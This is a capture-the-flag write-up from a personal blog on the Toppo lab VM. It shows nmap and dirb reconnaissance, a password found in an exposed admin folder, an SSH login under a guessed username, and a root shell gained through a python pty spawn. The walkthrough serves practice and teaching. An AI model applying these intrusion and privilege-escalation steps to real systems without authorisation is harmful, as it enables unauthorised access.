Lab – Toppo

My pick for the first blog is a Toppo by Hadi Mene. Yes, I know there are many write ups but there’s no reason not make my own one! 

Toppo is an entry level machine, but we have to start somewhere, right?

Virtual machine boots and all we got is this login screen:

toppo_1

We can give it a try and guess a login and password, but usually it doesn’t work this way. Typical pentest or CTF lab starts with a discovery phase where we have to enumerate anything within our reach (and beyond):

root@kali:~# nmap -sV -sC -O -A 192.168.89.129
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-13 08:46 EDT
Nmap scan report for 192.168.89.129
Host is up (0.00090s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
| 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 51422/tcp status
|_ 100024 1 51441/udp status
MAC Address: 00:0C:29:C7:DE:30 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.90 ms 192.168.89.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.65 seconds

So what do we have so far:

  • SSH on a standard port with OpenSSH 6.7p1;
  • Web server with Apache 2.4.10;
  • RPC with rpcbind 2-4.

Web server looks promising here. Let’s check it with a browser:

toppo_2

Ok, it’s an empty blog template with zero active content. We can browse it, but no luck. Sometimes certain pages or folders on a web server do not have direct links from web pages, but that doesn’t mean that they aren’t accessible. It’s a very common security flaw, so it definitely is worth checking:

root@kali:~# dirb http://192.168.89.129

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May 13 08:49:24 2019
URL_BASE: http://192.168.89.129/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.89.129/ ----
==> DIRECTORY: http://192.168.89.129/admin/
==> DIRECTORY: http://192.168.89.129/css/
==> DIRECTORY: http://192.168.89.129/img/
+ http://192.168.89.129/index.html (CODE:200|SIZE:6437)
==> DIRECTORY: http://192.168.89.129/js/
+ http://192.168.89.129/LICENSE (CODE:200|SIZE:1093)
==> DIRECTORY: http://192.168.89.129/mail/
==> DIRECTORY: http://192.168.89.129/manual/
+ http://192.168.89.129/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.89.129/vendor/

---- Entering directory: http://192.168.89.129/admin/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.89.129/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.89.129/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.89.129/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

Wow, take a look, we’ve got some admin folder, let’s go there:

toppo_3

Bingo, it looks like someone left a note here. File notes.txt reads:

toppo_4

So we got a password, but it’s obviously useless without a login. Pentest is all about trial and error, and we can start bruteforcing a login right away. But this time I can make a guess – take a closer look at the password. Since the author of this note isn’t good with technology, my best guess is that his login is just “ted”. Let’s check our guess and login via SSH:

root@kali:~# ssh ted@192.168.89.129
The authenticity of host '192.168.89.129 (192.168.89.129)' can't be established.
ECDSA key fingerprint is SHA256:+i9tqbQwK978CB+XRr02pS6QPd3evJ+lueOkK1LTtU0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.89.129' (ECDSA) to the list of known hosts.
ted@192.168.89.129's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 23 09:14:25 2019 from 192.168.89.129
ted@Toppo:~$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Yep, that’s it. We’re Ted now. Unfortunately, Ted doesn’t have any sufficient rights on this machine since he’s just a regular user. We have to escalate our privileges now. There is a bunch of techniques to do this under different circumstances and some of them work more other than another. Once again it’s a trial and error thing.  On this machine we see python installed, so let’s import a pty module and try to spawn a shell:

ted@Toppo:~$ python -c 'import pty;pty.spawn("/bin/sh")';
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

It worked. Now let’s browse to a root directory for our flag:

# cd /root/
# ls
flag.txt
# cat flag.txt
_________
| _ _ |
|_/ | | \_|.--. _.--. _ .--. . --.
| | / .'`\ \ ['/'`\ \ ['/'`\ \/ .'`\ \
_| |_ | \__. | | \__/ | | \__/ || \__. |
|_____| '.__.' | ;.__/ | ;.__/ '.__.'
[__| [__|


Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}

That’s it. Passion definitely comes with practice =)

 

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s